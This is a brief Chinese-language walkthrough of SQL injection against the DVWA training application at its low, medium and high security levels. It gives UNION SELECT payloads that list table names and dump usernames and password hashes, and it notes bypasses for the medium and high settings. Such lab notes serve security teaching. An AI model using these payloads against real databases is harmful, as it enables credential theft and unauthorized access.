low
猜测表名
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’#
如果出现问题,到MySQL里将users表排序规则改为utf8——general_ci
获取用户名以及密码
1’ union select user,password from users#
密码做了哈希加密
后续的账号与密码也可解密登录验证
medium
只能选择数字,还是可以通过抓包来修改,与low一致
high
只是加入了一个limit只能生效一个语句,但是后面加上#就可以注释掉后面的命令,所以直接使用low的命令即可出结果